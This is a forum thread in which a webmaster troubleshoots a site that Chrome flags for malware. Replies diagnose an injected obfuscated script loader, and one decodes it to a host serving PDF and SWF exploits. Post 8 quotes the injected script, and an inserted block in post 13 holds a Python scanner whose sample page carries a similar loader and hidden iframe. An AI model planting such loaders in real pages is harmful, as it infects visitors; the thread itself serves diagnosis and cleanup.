
Thread: Web site compromised?

  1. #1
    Kompu Kid
    Guest

    Web site compromised?

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn be on this site? What do
    "elements" mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza



  2. #2
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > I understand that visiting this site may harm my computer. "
    >
    > How can "elements" from beebest.cn be on this site? What do
    > "elements" mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza


  3. #3
    Martin
    Guest

    Re: Web site compromised?

    Kompu Kid wrote:
    > On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
    >> Hello All:
    >>
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.
    >>
    >> Chrome gives the following warning:
    >>
    >> "Warning: Visiting this site may harm your computer!
    >> The website at www.XXXX.YYY (I am not giving the actual URL) contains
    >> elements from the site beebest.cn, which appears to host malware
    >> software that can hurt your computer or otherwise operate without your
    >> consent. Just visiting a site that contains malware can infect your
    >> computer.
    >> For detailed information about the problems with these elements, visit
    >> the Google Safe Browsing diagnostic page for beebest.cn.
    >> Learn more about how to protect yourself from harmful software online.
    >> I understand that visiting this site may harm my computer. "
    >>
    >> How can "elements" from beebest.cn be on this site? What do
    >> "elements" mean in this case?
    >>
    >> I am downloading the site and will do a text search for "beebest" .
    >>
    >> Any other recommendations?
    >>
    >> Thanks
    >>
    >> Deguza

    >
    > I just had a friend try to access my website. He got the same message
    > except the beebest.cn was replaced by www.corpamata.cn.
    >
    > What is going on?


    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a decent answer from someone
    who bothers to go and look at the code.
    >
    > Deguza
    >


  4. #4
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 1:28 am, Martin <usene...@etiqa.co.uk> wrote:
    > Kompu Kid wrote:
    > > On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
    > >> Hello All:
    > >>
    > >> A website I manage seems to have a problem when I tried to access it
    > >> today with Chrome browser.
    > >>
    > >> Chrome gives the following warning:
    > >>
    > >> "Warning: Visiting this site may harm your computer!
    > >> The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > >> elements from the site beebest.cn, which appears to host malware
    > >> software that can hurt your computer or otherwise operate without your
    > >> consent. Just visiting a site that contains malware can infect your
    > >> computer.
    > >> For detailed information about the problems with these elements, visit
    > >> the Google Safe Browsing diagnostic page for beebest.cn.
    > >> Learn more about how to protect yourself from harmful software online.
    > >> I understand that visiting this site may harm my computer. "
    > >>
    > >> How can "elements" from beebest.cn be on this site? What do
    > >> "elements" mean in this case?
    > >>
    > >> I am downloading the site and will do a text search for "beebest" .
    > >>
    > >> Any other recommendations?
    > >>
    > >> Thanks
    > >>
    > >> Deguza
    > >
    > > I just had a friend try to access my website. He got the same message
    > > except the beebest.cn was replaced by www.corpamata.cn.
    > >
    > > What is going on?
    >
    > Dunno, but if it were my site I'd be looking to sack the webmaster
    > because he doesn't seem to know what he's doing.
    >
    > Post the frigging site and you might get a decent answer from someone
    > who bothers to go and look at the code.
    >
    > > Deguza


    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/...howtopic=26972

    Deguza

  5. #5
    1PW
    Guest

    Re: Web site compromised?

    On 04/22/2009 12:46 AM, Kompu Kid sent:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > I understand that visiting this site may harm my computer. "
    >
    > How can "elements" from beebest.cn be on this site? What do
    > "elements" mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
      ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
    --
    1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]

  6. #6
    John Holmes
    Guest

    Re: Web site compromised?

    Kompu Kid "contributed" in alt.hacker:

    > (I am not giving the actual URL)


    Don't expect any help then.

    --
    <snip>


  7. #7
    erewhon
    Guest

    Re: Web site compromised?

    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.

    Does it use SQL queries? If so, likely malware was inserted via SQL
    injection.



  8. #8
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries? If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>

  9. #9
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 9:22 am, John Holmes <nospam.13i...@gmail.com> wrote:
    > Kompu Kid "contributed" in alt.hacker:
    >
    > > (I am not giving the actual URL)

    >
    > Don't expect any help then.
    >
    > --
    > <snip>


    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza

  10. #10
    Todd H.
    Guest

    Re: Web site compromised?

    Kompu Kid <deguza@hotmail.com> writes:

    > These guys are complaining about the same thing. However, some are
    > finding no problems...
    >
    > http://www.greenockmorton.org/forum/...howtopic=26972


    PHP forums ...

    I lack the time to go there and triage it, but PHP is quite a
    playground, and forums even more so. Probably some sort of script
    injection attack if not a complete compromise.


    --
    Todd H.
    http://www.toddh.net/

  11. #11
    erewhon
    Guest

    Re: Web site compromised?


    "Kompu Kid" <deguza@hotmail.com> wrote in message
    news:d22517b4-3a4e-4fcb-97c4-5ea1ebe024ca@v23g2000pro.googlegroups.com...
    On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries? If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    What method do you use to upload content (ftp, and web admin page via http)?

    What web server is in use?

    The first is subject to password attack, the latter to application
    vulnerabilities.



  12. #12
    Gandalf Parker
    Guest

    Re: Web site compromised?

    Kompu Kid <deguza@hotmail.com> contributed wisdom to news:f1923657-9ee8-
    41ec-8ba7-beb74e9c329c@z23g2000prd.googlegroups.com:

    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >


    Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker

  13. #13
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>

    | On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.


    >> Does it use SQL queries? If so, likely malware was inserted via SQL
    >> injection


    | No, it does not use SQL queries.

    | I found this in one of the pages. I have not put this in there, unless
    | FrontPage, or the webhosting software put it in.

    | Or it could be the infection (I am putting "-"s in some of the key
    | words just in case it tries to execute on the web...):

    | <s-c-ript la-ngu-age=ja-va-script><!--
    | do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    | %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    | %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    | ii/g,""));
    | --></script><body>

    Yes !

    The web site was compromised.

    A decode of the above brings one to; 94.247.x.y/jquery.js
    Which in turn brings you to...
    94.247.x.y/news/?id=2 ( pdf exploit )
    94.247.x.y/news/?id=3 ( swf exploit )

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
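
Added example (not part of any post in this thread, and not the posters' own code): a static scan of downloaded site files for the injection shape quoted above. It repeats the `unescape(...).replace(...)` decode without executing anything, which shows why a plain text search for the flagged domain comes up empty. The sample page, its hosts (reserved `.example` names) and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Shape of the injected block quoted in this thread:
#   document.write(unescape('<%XX text + junk>').replace(/tok|tok|.../g, ""))
INJECT_RE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])(?P<payload>.*?)\1\s*\)"
    r"\s*\.replace\(\s*/(?P<junk>[^/]+)/g\s*,\s*(['\"])\4\s*\)",
    re.DOTALL,
)
# src= value of a script or iframe tag, quoted or bare.
SRC_RE = re.compile(r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_injection(payload, junk):
    """Repeat unescape(payload).replace(/junk/g, "") statically; nothing is executed."""
    payload = re.sub(r"[\r\n]+", "", payload)    # undo line wrapping from mail/news
    text = unquote(payload, encoding="latin-1")  # handles %XX; %uXXXX stays as-is
    # Assumption: the junk pattern is a plain list of literal tokens, as in the thread.
    tokens = [re.escape(t) for t in re.sub(r"\s+", "", junk).split("|") if t]
    return re.sub("|".join(tokens), "", text) if tokens else text


def external_refs(html, own_hosts):
    """Yield (tag, host, url) for script/iframe src values that point off-site."""
    for tag, url in SRC_RE.findall(html):
        try:
            host = urlparse(url).hostname
        except ValueError:
            host = None
        if host and host not in own_hosts:
            yield tag.lower(), host, url


def scan_html(html, own_hosts):
    """Return findings for plain and obfuscated off-site script/iframe loads."""
    findings = [("plain-" + t, h, u) for t, h, u in external_refs(html, own_hosts)]
    for m in INJECT_RE.finditer(html):
        decoded = decode_injection(m.group("payload"), m.group("junk"))
        refs = list(external_refs(decoded, own_hosts))
        findings += [("decoded-" + t, h, u) for t, h, u in refs]
        if not refs:  # obfuscated write with no recognisable src: still report it
            findings.append(("decoded-unknown", None, decoded))
    return findings


# Constructed sample page, not the poster's site; hosts use the reserved .example TLD.
SAMPLE_PAGE = """<html><head><title>Home</title>
<script src="js/menu.js"></script>
<script language=javascript><!--
document.write(unescape('qZ%3CscrWvipt%20sxK7rc%3D%2F%2FbaqZd%2EexamWvple%2Fj%2EjxK7s%3E%3C%2FscriqZpt%3E').replace(/qZ|xK7|Wv/g,""));
--></script><body>
<iframe src="http://frames.example/in.html" width=1 height=1></iframe>
<script src="http://www.mysite.example/js/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    print("text search finds host:", "bad.example" in SAMPLE_PAGE)
    for finding in scan_html(SAMPLE_PAGE, own_hosts={"www.mysite.example"}):
        print(finding)
```

Run `scan_html` over every downloaded file with the site's own hostnames in `own_hosts`; any remaining finding is a script or frame the site owner should be able to account for.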



  14. #14
    erewhon
    Guest

    Re: Web site compromised?


    > The web site was compromised.
    >
    > A decode of the above brings one to; 94.247.x.y/jquery.js
    > Which in turn brings you to...
    > 94.247.x.y/news/?id=2 ( pdf exploit )
    > 94.247.x.y/news/?id=3 ( swf exploit )


    I don't think he's interested in how the malware works, rather how it got
    onto his web site in the first place. His lack of technical information is
    limiting the responses to 'common attack vectors' - we cannot provide a
    definitive method by which this was done without further details of the
    host, how the content is updated, the o/s, web server, and apps running on
    it.....



  15. #15
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "erewhon" <erewhon@nowhere.net>


    >> The web site was compromised.


    >> A decode of the above brings one to; 94.247.x.y/jquery.js
    >> Which in turn brings you to...
    >> 94.247.x.y/news/?id=2 ( pdf exploit )
    >> 94.247.x.y/news/?id=3 ( swf exploit )


    | I don't think he's interested in how the malware works, rather how it got
    | onto his web site in the first place. His lack of technical information is
    | limiting the responses to 'common attack vectors' - we cannot provide a
    | definitive method by which this was done without further details of the
    | host, how the content is updated, the o/s, web server, and apps running on
    | it.....


    The subject of the post sounds like a query of if it was compromised.

    If the code snippet provided was off the un-named web site. We can say... Yes, it is.

    The OP indicated the reason for not providing the web site was "I did not want anybody
    getting infected, that's why I did not give it out." However, it could be posted
    obfuscated just like he did the code-snippet.

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



  16. #16
    Kompu Kid
    Guest

    Re: Web site compromised?



    UPDATE:

    * I found also a My hosting services told me that an infection on my
    personal computer is probably where the injection of suspect codes
    have started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.


  17. #17
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>



    | UPDATE:

    | * I found also a My hosting services told me that an infection on my
    | personal computer is probably where the injection of suspect codes
    | have started. He says the virus on my computer used the ftp link I
    | have to the web hosting site.

    | * In addition to the script I gave earlier, I found on some pages
    | another piece of code that had an "iframe" html command. The iframe
    | was referring to a chinese site "betwager". I am not able to write the
    | full code and the site. Google won't let me post it.


    Don't use Google !

    news://nntp.aioe.org/alt.computer.security
    Cross-Posted to the other groups.

    As for your hosting company, they could be wrong are just passing the blame to you.
    Chances are MORE likely that you use an application on the server with vulnerabilities and
    malicious actors have exploited them to add malicious code to your site.



    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



  18. #18
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 23, 4:03 pm, "David H. Lipman" <DLipman~nosp...@Verizon.Net>
    wrote:
    > From: "Kompu Kid" <deg...@hotmail.com>
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    >
    > Don't use Google !
    >
    > news://nntp.aioe.org/alt.computer.security
    > Cross-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.
    >
    > --
    > Dave
    > http://www.claymania.com/removal-trojan-adware.html
    > Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


    It seems like I need to install a newsreader on my computer to use the
    "news://nntp.aioe.org/alt.computer.security ".

    Outlook volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to chrome.

    Deguza

  19. #19
    Todd H.
    Guest

    Re: Web site compromised?

    "David H. Lipman" <DLipman~nospam~@Verizon.Net> writes:

    > From: "Kompu Kid" <deguza@hotmail.com>
    >
    >
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    > Cross-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.


    Much agreed. PHP is so porous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    whittle down the "how" in what happened perhaps.


    --
    Todd H.
    http://www.toddh.net/

  20. #20
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>


    | It seems like I need to install a newsreader on my computer to use the
    | "news://nntp.aioe.org/alt.computer.security ".

    | Outlook volunteered when I put that in my Chrome's address area, but
    | I do not want to use it.

    | Any recommendations for a news reader for the XP environment? If it
    | matters, I use Firefox in addition to chrome.

    | Deguza

    Mozilla Thunderbird - http://www.mozillamessaging.com/en-US/thunderbird/
    MicroPlanet Gravity - http://mpgravity.sourceforge.net/


    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


